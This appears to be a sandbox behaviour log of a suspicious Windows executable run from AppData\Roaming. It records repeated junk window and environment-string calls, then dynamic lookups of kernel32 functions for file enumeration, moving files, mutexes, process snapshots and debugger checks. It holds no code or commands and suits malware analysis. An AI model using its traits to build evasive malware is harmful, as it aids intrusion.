| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x74144bf0 |
|
1 | |
| Module | Load | module_name = kernel32.dll, base_address = 0x74120000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x74137810 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x74137a50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x74137600 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExA, address_out = 0x7413a700 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x74145100 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x74120000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x74137a50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x74147b30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x74138bf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x74137990 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExitThread, address_out = 0x76ef7a80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x74133870 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x74146630 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x74147020 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointerEx, address_out = 0x74146c50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x74162430 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineA, address_out = 0x7413ab60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x74132af0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x74131b90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x76eef730 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x76eed830 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleExW, address_out = 0x7413a2b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x741378b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x74132ad0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x74133880 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x74137710 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x7413a6e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x74146aa0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x76ee0e60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoW, address_out = 0x7413a740 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x7413a720 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x74146ca0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x74139b00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x741338a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x741323e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x74137620 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x7413aac0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x7413a7e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x7413b0b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x74139bf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x74162670 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x7413a940 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x74146730 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x741338c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x74145100 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x7413a120 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x74131b70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x741329d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x7413a040 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x74139bc0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x76ecf290 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x76ecf210 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x74131ba0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x7413a790 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x74138500 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x74145140 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x7413a290 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryExW, address_out = 0x74137930 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = RtlUnwind, address_out = 0x74138c10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OutputDebugStringW, address_out = 0x741619a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x76ec2bd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x76ebefe0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x74137950 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x76ebbb20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x74139f30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x741469b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x74146f60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x74146f70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x74146890 |
|
1 | |
| Module | Load | module_name = msvcr100.dll, base_address = 0x6f970000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\msvcr100.dll, function = atexit, address_out = 0x6f98c544 |
|
1 | |
| System | Get Time | type = System Time, time = 2018-03-14 01:00:22 (UTC) |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x74120000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x7413a980 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x74144ff0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x74137570 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x74139e30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x74146740 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventExW, address_out = 0x741466a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x74146700 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadStackGuarantee, address_out = 0x7413b040 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x7413ace0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x76ed7dc0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x76ee4010 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x76ee2a50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x7413a7b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolWait, address_out = 0x76ee2290 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x76ee2910 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x76f07a60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x76efac00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x76eea890 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalProcessorInformation, address_out = 0x7413ac80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x74160830 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x767f6270 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesEx, address_out = 0x7413fe80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringEx, address_out = 0x7413ff80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatEx, address_out = 0x74160e00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x7413a750 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatEx, address_out = 0x74161240 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLocaleName, address_out = 0x7413ad60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocaleName, address_out = 0x74161460 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x74139a10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentPackageId, address_out = 0x7677ded0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount64, address_out = 0x74133630 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Module | Get Filename | process_name = c:\users\nd9e1fyi\appdata\roamingqtp35.exe, file_name_orig = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, size = 260 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x74120000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x74146bb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x74146c40 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x74146a50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x74133870 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = MoveFileW, address_out = 0x7413b1d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyW, address_out = 0x7415d260 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFileAttributesW, address_out = 0x74146c20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexW, address_out = 0x741466f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x74146a10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VerSetConditionMask, address_out = 0x76ef1a40 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x74146820 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x74145eb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSection, address_out = 0x76eea200 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x74138bf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemDirectoryW, address_out = 0x74139fd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x74140160 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x74137990 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x74145100 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VerifyVersionInfoW, address_out = 0x74138c30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForMultipleObjects, address_out = 0x74146800 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x76ee0e60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsW, address_out = 0x7413cd50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x74133690 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetHandleInformation, address_out = 0x74146660 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatA, address_out = 0x7413f640 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x74132ad0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreatePipe, address_out = 0x74130540 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiA, address_out = 0x74137830 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x7413d290 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x74147b50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x76ecf210 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x76ecf290 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x74146960 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpW, address_out = 0x74137970 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x741468e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x741469a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x7413ac70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x741446a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetDiskFreeSpaceW, address_out = 0x741469f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetWindowsDirectoryW, address_out = 0x74145120 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeInformationW, address_out = 0x74146b60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x74144bf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiW, address_out = 0x74137590 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x74137600 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x74139b90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x74146630 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatW, address_out = 0x7415d170 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileMappingW, address_out = 0x741399b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExitThread, address_out = 0x76ef7a80 |
|
1 | |
